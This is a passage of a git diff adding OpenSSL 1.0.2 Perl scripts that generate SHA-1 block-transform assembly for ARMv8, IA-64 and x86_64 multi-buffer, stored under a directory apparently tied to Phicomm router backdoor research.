+	ror	$b,$b,#2
+	add	$d,$d,@Xw[($i+1)&15]	// future e+=X[i]
+	add	$e,$e,$t0		// e+=F(b,c,d)
+___
+$code.=<<___ if ($i==19);
+	movz	$K,#0xeba1
+	movk	$K,#0x6ed9,lsl#16
+___
+$code.=<<___ if ($i>=14);
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+2)&15]
+	bic	$t0,$d,$b
+	and	$t1,$c,$b
+	ror	$t2,$a,#27
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+8)&15]
+	add	$d,$d,$K		// future e+=K
+	orr	$t0,$t0,$t1
+	add	$e,$e,$t2		// e+=rot(a,5)
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+13)&15]
+	ror	$b,$b,#2
+	add	$d,$d,@Xw[($i+1)&15]	// future e+=X[i]
+	add	$e,$e,$t0		// e+=F(b,c,d)
+	 ror	@Xw[$j],@Xw[$j],#31
+___
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=($i+2)&15;
+
+$code.=<<___ if ($i==59);
+	movz	$K,#0xc1d6
+	movk	$K,#0xca62,lsl#16
+___
+$code.=<<___;
+	orr	$t0,$b,$c
+	and	$t1,$b,$c
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+2)&15]
+	ror	$t2,$a,#27
+	and	$t0,$t0,$d
+	add	$d,$d,$K		// future e+=K
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+8)&15]
+	add	$e,$e,$t2		// e+=rot(a,5)
+	orr	$t0,$t0,$t1
+	ror	$b,$b,#2
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+13)&15]
+	add	$d,$d,@Xw[($i+1)&15]	// future e+=X[i]
+	add	$e,$e,$t0		// e+=F(b,c,d)
+	 ror	@Xw[$j],@Xw[$j],#31
+___
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=($i+2)&15;
+
+$code.=<<___ if ($i==39);
+	movz	$K,#0xbcdc
+	movk	$K,#0x8f1b,lsl#16
+___
+$code.=<<___ if ($i<78);
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+2)&15]
+	eor	$t0,$d,$b
+	ror	$t2,$a,#27
+	add	$d,$d,$K		// future e+=K
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+8)&15]
+	eor	$t0,$t0,$c
+	add	$e,$e,$t2		// e+=rot(a,5)
+	ror	$b,$b,#2
+	 eor	@Xw[$j],@Xw[$j],@Xw[($j+13)&15]
+	add	$d,$d,@Xw[($i+1)&15]	// future e+=X[i]
+	add	$e,$e,$t0		// e+=F(b,c,d)
+	 ror	@Xw[$j],@Xw[$j],#31
+___
+$code.=<<___ if ($i==78);
+	ldp	@Xw[1],@Xw[2],[$ctx]
+	eor	$t0,$d,$b
+	ror	$t2,$a,#27
+	add	$d,$d,$K		// future e+=K
+	eor	$t0,$t0,$c
+	add	$e,$e,$t2		// e+=rot(a,5)
+	ror	$b,$b,#2
+	add	$d,$d,@Xw[($i+1)&15]	// future e+=X[i]
+	add	$e,$e,$t0		// e+=F(b,c,d)
+___
+$code.=<<___ if ($i==79);
+	ldp	@Xw[3],@Xw[4],[$ctx,#8]
+	eor	$t0,$d,$b
+	ror	$t2,$a,#27
+	eor	$t0,$t0,$c
+	add	$e,$e,$t2		// e+=rot(a,5)
+	ror	$b,$b,#2
+	ldr	@Xw[5],[$ctx,#16]
+	add	$e,$e,$t0		// e+=F(b,c,d)
+___
+}
+
+$code.=<<___;
+#include "arm_arch.h"
+
+.text
+
+.globl	sha1_block_data_order
+.type	sha1_block_data_order,%function
+.align	6
+sha1_block_data_order:
+	ldr	x16,.LOPENSSL_armcap_P
+	adr	x17,.LOPENSSL_armcap_P
+	add	x16,x16,x17
+	ldr	w16,[x16]
+	tst	w16,#ARMV8_SHA1
+	b.ne	.Lv8_entry
+
+	stp	x29,x30,[sp,#-96]!
+	add	x29,sp,#0
+	stp	x19,x20,[sp,#16]
+	stp	x21,x22,[sp,#32]
+	stp	x23,x24,[sp,#48]
+	stp	x25,x26,[sp,#64]
+	stp	x27,x28,[sp,#80]
+
+	ldp	$A,$B,[$ctx]
+	ldp	$C,$D,[$ctx,#8]
+	ldr	$E,[$ctx,#16]
+
+.Loop:
+	ldr	@Xx[0],[$inp],#64
+	movz	$K,#0x7999
+	sub	$num,$num,#1
+	movk	$K,#0x5a82,lsl#16
+#ifdef	__ARMEB__
+	ror	$Xx[0],@Xx[0],#32
+#else
+	rev32	@Xx[0],@Xx[0]
+#endif
+	add	$E,$E,$K		// warm it up
+	add	$E,$E,@Xw[0]
+___
+for($i=0;$i<20;$i++)	{ &BODY_00_19($i,@V); unshift(@V,pop(@V)); }
+for(;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+for(;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+for(;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	add	$B,$B,@Xw[2]
+	add	$C,$C,@Xw[3]
+	add	$A,$A,@Xw[1]
+	add	$D,$D,@Xw[4]
+	add	$E,$E,@Xw[5]
+	stp	$A,$B,[$ctx]
+	stp	$C,$D,[$ctx,#8]
+	str	$E,[$ctx,#16]
+	cbnz	$num,.Loop
+
+	ldp	x19,x20,[sp,#16]
+	ldp	x21,x22,[sp,#32]
+	ldp	x23,x24,[sp,#48]
+	ldp	x25,x26,[sp,#64]
+	ldp	x27,x28,[sp,#80]
+	ldr	x29,[sp],#96
+	ret
+.size	sha1_block_data_order,.-sha1_block_data_order
+___
+{{{
+my ($ABCD,$E,$E0,$E1)=map("v$_.16b",(0..3));
+my @MSG=map("v$_.16b",(4..7));
+my @Kxx=map("v$_.4s",(16..19));
+my ($W0,$W1)=("v20.4s","v21.4s");
+my $ABCD_SAVE="v22.16b";
+
+$code.=<<___;
+.type	sha1_block_armv8,%function
+.align	6
+sha1_block_armv8:
+.Lv8_entry:
+	stp	x29,x30,[sp,#-16]!
+	add	x29,sp,#0
+
+	adr	x4,.Lconst
+	eor	$E,$E,$E
+	ld1.32	{$ABCD},[$ctx],#16
+	ld1.32	{$E}[0],[$ctx]
+	sub	$ctx,$ctx,#16
+	ld1.32	{@Kxx[0]-@Kxx[3]},[x4]
+
+.Loop_hw:
+	ld1	{@MSG[0]-@MSG[3]},[$inp],#64
+	sub	$num,$num,#1
+	rev32	@MSG[0],@MSG[0]
+	rev32	@MSG[1],@MSG[1]
+
+	add.i32	$W0,@Kxx[0],@MSG[0]
+	rev32	@MSG[2],@MSG[2]
+	orr	$ABCD_SAVE,$ABCD,$ABCD	// offload
+
+	add.i32	$W1,@Kxx[0],@MSG[1]
+	rev32	@MSG[3],@MSG[3]
+	sha1h	$E1,$ABCD
+	sha1c	$ABCD,$E,$W0		// 0
+	add.i32	$W0,@Kxx[$j],@MSG[2]
+	sha1su0	@MSG[0],@MSG[1],@MSG[2]
+___
+for ($j=0,$i=1;$i<20-3;$i++) {
+my $f=("c","p","m","p")[$i/5];
+$code.=<<___;
+	sha1h	$E0,$ABCD		// $i
+	sha1$f	$ABCD,$E1,$W1
+	add.i32	$W1,@Kxx[$j],@MSG[3]
+	sha1su1	@MSG[0],@MSG[3]
+___
+$code.=<<___ if ($i<20-4);
+	sha1su0	@MSG[1],@MSG[2],@MSG[3]
+___
+	($E0,$E1)=($E1,$E0);		($W0,$W1)=($W1,$W0);
+	push(@MSG,shift(@MSG));		$j++ if ((($i+3)%5)==0);
+}
+$code.=<<___;
+	sha1h	$E0,$ABCD		// $i
+	sha1p	$ABCD,$E1,$W1
+	add.i32	$W1,@Kxx[$j],@MSG[3]
+
+	sha1h	$E1,$ABCD		// 18
+	sha1p	$ABCD,$E0,$W0
+
+	sha1h	$E0,$ABCD		// 19
+	sha1p	$ABCD,$E1,$W1
+
+	add.i32	$E,$E,$E0
+	add.i32	$ABCD,$ABCD,$ABCD_SAVE
+
+	cbnz	$num,.Loop_hw
+
+	st1.32	{$ABCD},[$ctx],#16
+	st1.32	{$E}[0],[$ctx]
+
+	ldr	x29,[sp],#16
+	ret
+.size	sha1_block_armv8,.-sha1_block_armv8
+.align	6
+.Lconst:
+.long	0x5a827999,0x5a827999,0x5a827999,0x5a827999	//K_00_19
+.long	0x6ed9eba1,0x6ed9eba1,0x6ed9eba1,0x6ed9eba1	//K_20_39
+.long	0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc	//K_40_59
+.long	0xca62c1d6,0xca62c1d6,0xca62c1d6,0xca62c1d6	//K_60_79
+.LOPENSSL_armcap_P:
+.quad	OPENSSL_armcap_P-.
+.asciz	"SHA1 block transform for ARMv8, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+.comm	OPENSSL_armcap_P,4,4
+___
+}}}
+
+{   my	%opcode = (
+	"sha1c"		=> 0x5e000000,	"sha1p"		=> 0x5e001000,
+	"sha1m"		=> 0x5e002000,	"sha1su0"	=> 0x5e003000,
+	"sha1h"		=> 0x5e280800,	"sha1su1"	=> 0x5e281800	);
+
+    sub unsha1 {
+	my ($mnemonic,$arg)=@_;
+
+	$arg =~ m/[qv]([0-9]+)[^,]*,\s*[qv]([0-9]+)[^,]*(?:,\s*[qv]([0-9]+))?/o
+	&&
+	sprintf ".inst\t0x%08x\t//%s %s",
+			$opcode{$mnemonic}|$1|($2<<5)|($3<<16),
+			$mnemonic,$arg;
+    }
+}
+
+foreach(split("\n",$code)) {
+
+	s/\`([^\`]*)\`/eval($1)/geo;
+
+	s/\b(sha1\w+)\s+([qv].*)/unsha1($1,$2)/geo;
+
+	s/\.\w?32\b//o		and s/\.16b/\.4s/go;
+	m/(ld|st)1[^\[]+\[0\]/o	and s/\.4s/\.s/go;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-ia64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-ia64.pl
new file mode 100644
index 0000000..02d35d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-ia64.pl
@@ -0,0 +1,305 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# Eternal question is what's wrong with compiler generated code? The
+# trick is that it's possible to reduce the number of shifts required
+# to perform rotations by maintaining copy of 32-bit value in upper
+# bits of 64-bit register. Just follow mux2 and shrp instructions...
+# Performance under big-endian OS such as HP-UX is 179MBps*1GHz, which
+# is >50% better than HP C and >2x better than gcc.
+
+$code=<<___;
+.ident  \"sha1-ia64.s, version 1.3\"
+.ident  \"IA-64 ISA artwork by Andy Polyakov <appro\@fy.chalmers.se>\"
+.explicit
+
+___
+
+
+if ($^O eq "hpux") {
+    $ADDP="addp4";
+    for (@ARGV) { $ADDP="add" if (/[\+DD|\-mlp]64/); }
+} else { $ADDP="add"; }
+
+#$human=1;
+if ($human) {	# useful for visual code auditing...
+	($A,$B,$C,$D,$E)   = ("A","B","C","D","E");
+	($h0,$h1,$h2,$h3,$h4) = ("h0","h1","h2","h3","h4");
+	($K_00_19, $K_20_39, $K_40_59, $K_60_79) =
+	    (	"K_00_19","K_20_39","K_40_59","K_60_79"	);
+	@X= (	"X0", "X1", "X2", "X3", "X4", "X5", "X6", "X7",
+		"X8", "X9","X10","X11","X12","X13","X14","X15"	);
+}
+else {
+	($A,$B,$C,$D,$E)   =    ("loc0","loc1","loc2","loc3","loc4");
+	($h0,$h1,$h2,$h3,$h4) = ("loc5","loc6","loc7","loc8","loc9");
+	($K_00_19, $K_20_39, $K_40_59, $K_60_79) =
+	    (	"r14", "r15", "loc10", "loc11"	);
+	@X= (	"r16", "r17", "r18", "r19", "r20", "r21", "r22", "r23",
+		"r24", "r25", "r26", "r27", "r28", "r29", "r30", "r31"	);
+}
+
+sub BODY_00_15 {
+local	*code=shift;
+my	($i,$a,$b,$c,$d,$e)=@_;
+my	$j=$i+1;
+my	$Xn=@X[$j%16];
+
+$code.=<<___ if ($i==0);
+{ .mmi;	ld1	$X[$i]=[inp],2		    // MSB
+	ld1	tmp2=[tmp3],2		};;
+{ .mmi;	ld1	tmp0=[inp],2
+	ld1	tmp4=[tmp3],2		    // LSB
+	dep	$X[$i]=$X[$i],tmp2,8,8	};;
+___
+if ($i<15) {
+	$code.=<<___;
+{ .mmi;	ld1	$Xn=[inp],2		    // forward Xload
+	nop.m	0x0
+	dep	tmp1=tmp0,tmp4,8,8	};;
+{ .mmi;	ld1	tmp2=[tmp3],2		    // forward Xload
+	and	tmp4=$c,$b
+	dep	$X[$i]=$X[$i],tmp1,16,16} //;;
+{ .mmi;	add	$e=$e,$K_00_19		    // e+=K_00_19
+	andcm	tmp1=$d,$b
+	dep.z	tmp5=$a,5,27		};; // a<<5
+{ .mmi;	add	$e=$e,$X[$i]		    // e+=Xload
+	or	tmp4=tmp4,tmp1		    // F_00_19(b,c,d)=(b&c)|(~b&d)
+	extr.u	tmp1=$a,27,5		};; // a>>27
+{ .mmi;	ld1	tmp0=[inp],2		    // forward Xload
+	add	$e=$e,tmp4		    // e+=F_00_19(b,c,d)
+	shrp	$b=tmp6,tmp6,2		}   // b=ROTATE(b,30)
+{ .mmi;	ld1	tmp4=[tmp3],2		    // forward Xload
+	or	tmp5=tmp1,tmp5		    // ROTATE(a,5)
+	mux2	tmp6=$a,0x44		};; // see b in next iteration
+{ .mii;	add	$e=$e,tmp5		    // e+=ROTATE(a,5)
+	dep	$Xn=$Xn,tmp2,8,8	    // forward Xload
+	mux2	$X[$i]=$X[$i],0x44	} //;;
+
+___
+	}
+else	{
+	$code.=<<___;
+{ .mii;	and	tmp3=$c,$b
+	dep	tmp1=tmp0,tmp4,8,8;;
+	dep	$X[$i]=$X[$i],tmp1,16,16} //;;
+{ .mmi;	add	$e=$e,$K_00_19		    // e+=K_00_19
+	andcm	tmp1=$d,$b
+	dep.z	tmp5=$a,5,27		};; // a<<5
+{ .mmi;	add	$e=$e,$X[$i]		    // e+=Xupdate
+	or	tmp4=tmp3,tmp1		    // F_00_19(b,c,d)=(b&c)|(~b&d)
+	extr.u	tmp1=$a,27,5		}   // a>>27
+{ .mmi;	xor	$Xn=$Xn,$X[($j+2)%16]	    // forward Xupdate
+	xor	tmp3=$X[($j+8)%16],$X[($j+13)%16] // forward Xupdate
+	nop.i	0			};;
+{ .mmi;	add	$e=$e,tmp4		    // e+=F_00_19(b,c,d)
+	xor	$Xn=$Xn,tmp3		    // forward Xupdate
+	shrp	$b=tmp6,tmp6,2		}   // b=ROTATE(b,30)
+{ .mmi; or	tmp1=tmp1,tmp5		    // ROTATE(a,5)
+	mux2	tmp6=$a,0x44		};; // see b in next iteration
+{ .mii;	add	$e=$e,tmp1		    // e+=ROTATE(a,5)
+	shrp	$Xn=$Xn,$Xn,31		    // ROTATE(x[0]^x[2]^x[8]^x[13],1)
+	mux2	$X[$i]=$X[$i],0x44	};;
+
+___
+	}
+}
+
+sub BODY_16_19 {
+local	*code=shift;
+my	($i,$a,$b,$c,$d,$e)=@_;
+my	$j=$i+1;
+my	$Xn=@X[$j%16];
+
+$code.=<<___;
+{ .mib;	add	$e=$e,$K_00_19		    // e+=K_00_19
+	dep.z	tmp5=$a,5,27		}   // a<<5
+{ .mib;	andcm	tmp1=$d,$b
+	and	tmp0=$c,$b		};;
+{ .mmi;	add	$e=$e,$X[$i%16]		    // e+=Xupdate
+	or	tmp0=tmp0,tmp1		    // F_00_19(b,c,d)=(b&c)|(~b&d)
+	extr.u	tmp1=$a,27,5		}   // a>>27
+{ .mmi;	xor	$Xn=$Xn,$X[($j+2)%16]	    // forward Xupdate
+	xor	tmp3=$X[($j+8)%16],$X[($j+13)%16]	// forward Xupdate
+	nop.i	0			};;
+{ .mmi;	add	$e=$e,tmp0		    // f+=F_00_19(b,c,d)
+	xor	$Xn=$Xn,tmp3		    // forward Xupdate
+	shrp	$b=tmp6,tmp6,2		}   // b=ROTATE(b,30)
+{ .mmi;	or	tmp1=tmp1,tmp5		    // ROTATE(a,5)
+	mux2	tmp6=$a,0x44		};; // see b in next iteration
+{ .mii;	add	$e=$e,tmp1		    // e+=ROTATE(a,5)
+	shrp	$Xn=$Xn,$Xn,31		    // ROTATE(x[0]^x[2]^x[8]^x[13],1)
+	nop.i	0			};;
+
+___
+}
+
+sub BODY_20_39 {
+local	*code=shift;
+my	($i,$a,$b,$c,$d,$e,$Konst)=@_;
+	$Konst = $K_20_39 if (!defined($Konst));
+my	$j=$i+1;
+my	$Xn=@X[$j%16];
+
+if ($i<79) {
+$code.=<<___;
+{ .mib;	add	$e=$e,$Konst		    // e+=K_XX_XX
+	dep.z	tmp5=$a,5,27		}   // a<<5
+{ .mib;	xor	tmp0=$c,$b
+	xor	$Xn=$Xn,$X[($j+2)%16]	};; // forward Xupdate
+{ .mib;	add	$e=$e,$X[$i%16]		    // e+=Xupdate
+	extr.u	tmp1=$a,27,5		}   // a>>27
+{ .mib;	xor	tmp0=tmp0,$d		    // F_20_39(b,c,d)=b^c^d
+	xor	$Xn=$Xn,$X[($j+8)%16]	};; // forward Xupdate
+{ .mmi;	add	$e=$e,tmp0		    // e+=F_20_39(b,c,d)
+	xor	$Xn=$Xn,$X[($j+13)%16]	    // forward Xupdate
+	shrp	$b=tmp6,tmp6,2		}   // b=ROTATE(b,30)
+{ .mmi;	or	tmp1=tmp1,tmp5		    // ROTATE(a,5)
+	mux2	tmp6=$a,0x44		};; // see b in next iteration
+{ .mii;	add	$e=$e,tmp1		    // e+=ROTATE(a,5)
+	shrp	$Xn=$Xn,$Xn,31		    // ROTATE(x[0]^x[2]^x[8]^x[13],1)
+	nop.i	0			};;
+
+___
+}
+else {
+$code.=<<___;
+{ .mib;	add	$e=$e,$Konst		    // e+=K_60_79
+	dep.z	tmp5=$a,5,27		}   // a<<5
+{ .mib;	xor	tmp0=$c,$b
+	add	$h1=$h1,$a		};; // wrap up
+{ .mib;	add	$e=$e,$X[$i%16]		    // e+=Xupdate
+	extr.u	tmp1=$a,27,5		}   // a>>27
+{ .mib;	xor	tmp0=tmp0,$d		    // F_20_39(b,c,d)=b^c^d
+	add	$h3=$h3,$c		};; // wrap up
+{ .mmi;	add	$e=$e,tmp0		    // e+=F_20_39(b,c,d)
+	or	tmp1=tmp1,tmp5		    // ROTATE(a,5)
+	shrp	$b=tmp6,tmp6,2		};; // b=ROTATE(b,30) ;;?
+{ .mmi;	add	$e=$e,tmp1		    // e+=ROTATE(a,5)
+	add	tmp3=1,inp		    // used in unaligned codepath
+	add	$h4=$h4,$d		};; // wrap up
+
+___
+}
+}
+
+sub BODY_40_59 {
+local	*code=shift;
+my	($i,$a,$b,$c,$d,$e)=@_;
+my	$j=$i+1;
+my	$Xn=@X[$j%16];
+
+$code.=<<___;
+{ .mib;	add	$e=$e,$K_40_59		    // e+=K_40_59
+	dep.z	tmp5=$a,5,27		}   // a<<5
+{ .mib;	and	tmp1=$c,$d
+	xor	tmp0=$c,$d		};;
+{ .mmi;	add	$e=$e,$X[$i%16]		    // e+=Xupdate
+	add	tmp5=tmp5,tmp1		    // a<<5+(c&d)
+	extr.u	tmp1=$a,27,5		}   // a>>27
+{ .mmi;	and	tmp0=tmp0,$b
+	xor	$Xn=$Xn,$X[($j+2)%16]	    // forward Xupdate
+	xor	tmp3=$X[($j+8)%16],$X[($j+13)%16] };;	// forward Xupdate
+{ .mmi;	add	$e=$e,tmp0		    // e+=b&(c^d)
+	add	tmp5=tmp5,tmp1		    // ROTATE(a,5)+(c&d)
+	shrp	$b=tmp6,tmp6,2		}   // b=ROTATE(b,30)
+{ .mmi;	xor	$Xn=$Xn,tmp3
+	mux2	tmp6=$a,0x44		};; // see b in next iteration
+{ .mii;	add	$e=$e,tmp5		    // e+=ROTATE(a,5)+(c&d)
+	shrp	$Xn=$Xn,$Xn,31		    // ROTATE(x[0]^x[2]^x[8]^x[13],1)
+	nop.i	0x0			};;
+
+___
+}
+sub BODY_60_79	{ &BODY_20_39(@_,$K_60_79); }
+
+$code.=<<___;
+.text
+
+tmp0=r8;
+tmp1=r9;
+tmp2=r10;
+tmp3=r11;
+ctx=r32;	// in0
+inp=r33;	// in1
+
+// void sha1_block_data_order(SHA_CTX *c,const void *p,size_t num);
+.global	sha1_block_data_order#
+.proc	sha1_block_data_order#
+.align	32
+sha1_block_data_order:
+	.prologue
+{ .mmi;	alloc	tmp1=ar.pfs,3,14,0,0
+	$ADDP	tmp0=4,ctx
+	.save	ar.lc,r3
+	mov	r3=ar.lc		}
+{ .mmi;	$ADDP	ctx=0,ctx
+	$ADDP	inp=0,inp
+	mov	r2=pr			};;
+tmp4=in2;
+tmp5=loc12;
+tmp6=loc13;
+	.body
+{ .mlx;	ld4	$h0=[ctx],8
+	movl	$K_00_19=0x5a827999	}
+{ .mlx;	ld4	$h1=[tmp0],8
+	movl	$K_20_39=0x6ed9eba1	};;
+{ .mlx;	ld4	$h2=[ctx],8
+	movl	$K_40_59=0x8f1bbcdc	}
+{ .mlx;	ld4	$h3=[tmp0]
+	movl	$K_60_79=0xca62c1d6	};;
+{ .mmi;	ld4	$h4=[ctx],-16
+	add	in2=-1,in2		    // adjust num for ar.lc
+	mov	ar.ec=1			};;
+{ .mmi;	nop.m	0
+	add	tmp3=1,inp
+	mov	ar.lc=in2		};; // brp.loop.imp: too far
+
+.Ldtop:
+{ .mmi;	mov	$A=$h0
+	mov	$B=$h1
+	mux2	tmp6=$h1,0x44		}
+{ .mmi;	mov	$C=$h2
+	mov	$D=$h3
+	mov	$E=$h4			};;
+
+___
+
+{ my $i;
+  my @V=($A,$B,$C,$D,$E);
+
+	for($i=0;$i<16;$i++)	{ &BODY_00_15(\$code,$i,@V); unshift(@V,pop(@V)); }
+	for(;$i<20;$i++)	{ &BODY_16_19(\$code,$i,@V); unshift(@V,pop(@V)); }
+	for(;$i<40;$i++)	{ &BODY_20_39(\$code,$i,@V); unshift(@V,pop(@V)); }
+	for(;$i<60;$i++)	{ &BODY_40_59(\$code,$i,@V); unshift(@V,pop(@V)); }
+	for(;$i<80;$i++)	{ &BODY_60_79(\$code,$i,@V); unshift(@V,pop(@V)); }
+
+	(($V[0] eq $A) and ($V[4] eq $E)) or die;	# double-check
+}
+
+$code.=<<___;
+{ .mmb;	add	$h0=$h0,$A
+	add	$h2=$h2,$C
+	br.ctop.dptk.many	.Ldtop	};;
+.Ldend:
+{ .mmi;	add	tmp0=4,ctx
+	mov	ar.lc=r3		};;
+{ .mmi;	st4	[ctx]=$h0,8
+	st4	[tmp0]=$h1,8		};;
+{ .mmi;	st4	[ctx]=$h2,8
+	st4	[tmp0]=$h3		};;
+{ .mib;	st4	[ctx]=$h4,-16
+	mov	pr=r2,0x1ffff
+	br.ret.sptk.many	b0	};;
+.endp	sha1_block_data_order#
+stringz	"SHA1 block transform for IA64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$output=shift and open STDOUT,">$output";
+print $code;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-mb-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-mb-x86_64.pl
new file mode 100644
index 0000000..a8ee075
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-mb-x86_64.pl
@@ -0,0 +1,1574 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# Multi-buffer SHA1 procedure processes n buffers in parallel by
+# placing buffer data to designated lane of SIMD register. n is
+# naturally limited to 4 on pre-AVX2 processors and to 8 on
+# AVX2-capable processors such as Haswell.
+#
+#		this	+aesni(i)	sha1	aesni-sha1	gain(iv)
+# -------------------------------------------------------------------
+# Westmere(ii)	10.7/n	+1.28=3.96(n=4)	5.30	6.66		+68%
+# Atom(ii)	18.1/n	+3.93=8.46(n=4)	9.37	12.8		+51%
+# Sandy Bridge	(8.16	+5.15=13.3)/n	4.99	5.98		+80%
+# Ivy Bridge	(8.08	+5.14=13.2)/n	4.60	5.54		+68%
+# Haswell(iii)	(8.96	+5.00=14.0)/n	3.57	4.55		+160%
+# Bulldozer	(9.76	+5.76=15.5)/n	5.95	6.37		+64%
+#
+# (i)	multi-block CBC encrypt with 128-bit key;
+# (ii)	(HASH+AES)/n does not apply to Westmere for n>3 and Atom,
+#	because of lower AES-NI instruction throughput;
+# (iii)	"this" is for n=8, when we gather twice as much data, result
+#	for n=4 is 8.00+4.44=12.4;
+# (iv)	presented improvement coefficients are asymptotic limits and
+#	in real-life application are somewhat lower, e.g. for 2KB
+#	fragments they range from 30% to 100% (on Haswell);
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+$avx=0;
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	   `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	   `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+# void sha1_multi_block (
+#     struct {	unsigned int A[8];
+#		unsigned int B[8];
+#		unsigned int C[8];
+#		unsigned int D[8];
+#		unsigned int E[8];	} *ctx,
+#     struct {	void *ptr; int blocks;	} inp[8],
+#     int num);		/* 1 or 2 */
+#
+$ctx="%rdi";	# 1st arg
+$inp="%rsi";	# 2nd arg
+$num="%edx";
+@ptr=map("%r$_",(8..11));
+$Tbl="%rbp";
+
+@V=($A,$B,$C,$D,$E)=map("%xmm$_",(0..4));
+($t0,$t1,$t2,$t3,$tx)=map("%xmm$_",(5..9));
+@Xi=map("%xmm$_",(10..14));
+$K="%xmm15";
+
+if (1) {
+    # Atom-specific optimization aiming to eliminate pshufb with high
+    # registers [and thus get rid of 48 cycles accumulated penalty] 
+    @Xi=map("%xmm$_",(0..4));
+    ($tx,$t0,$t1,$t2,$t3)=map("%xmm$_",(5..9));
+    @V=($A,$B,$C,$D,$E)=map("%xmm$_",(10..14));
+}
+
+$REG_SZ=16;
+
+sub Xi_off {
+my $off = shift;
+
+    $off %= 16; $off *= $REG_SZ;
+    $off<256 ? "$off-128(%rax)" : "$off-256-128(%rbx)";
+}
+
+sub BODY_00_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+my $k=$i+2;
+
+# Loads are performed 2+3/4 iterations in advance. 3/4 means that out
+# of 4 words you would expect to be loaded per given iteration one is
+# spilled to next iteration. In other words indices in four input
+# streams are distributed as following:
+#
+# $i==0:	0,0,0,0,1,1,1,1,2,2,2,
+# $i==1:	2,3,3,3,
+# $i==2:	3,4,4,4,
+# ...
+# $i==13:	14,15,15,15,
+# $i==14:	15
+# 
+# Then at $i==15 Xupdate is applied one iteration in advance...
+$code.=<<___ if ($i==0);
+	movd		(@ptr[0]),@Xi[0]
+	 lea		`16*4`(@ptr[0]),@ptr[0]
+	movd		(@ptr[1]),@Xi[2]	# borrow @Xi[2]
+	 lea		`16*4`(@ptr[1]),@ptr[1]
+	movd		(@ptr[2]),@Xi[3]	# borrow @Xi[3]
+	 lea		`16*4`(@ptr[2]),@ptr[2]
+	movd		(@ptr[3]),@Xi[4]	# borrow @Xi[4]
+	 lea		`16*4`(@ptr[3]),@ptr[3]
+	punpckldq	@Xi[3],@Xi[0]
+	 movd		`4*$j-16*4`(@ptr[0]),@Xi[1]
+	punpckldq	@Xi[4],@Xi[2]
+	 movd		`4*$j-16*4`(@ptr[1]),$t3
+	punpckldq	@Xi[2],@Xi[0]
+	 movd		`4*$j-16*4`(@ptr[2]),$t2
+	pshufb		$tx,@Xi[0]
+___
+$code.=<<___ if ($i<14);			# just load input
+	 movd		`4*$j-16*4`(@ptr[3]),$t1
+	 punpckldq	$t2,@Xi[1]
+	movdqa	$a,$t2
+	paddd	$K,$e				# e+=K_00_19
+	 punpckldq	$t1,$t3
+	movdqa	$b,$t1
+	movdqa	$b,$t0
+	pslld	\$5,$t2
+	pandn	$d,$t1
+	pand	$c,$t0
+	 punpckldq	$t3,@Xi[1]
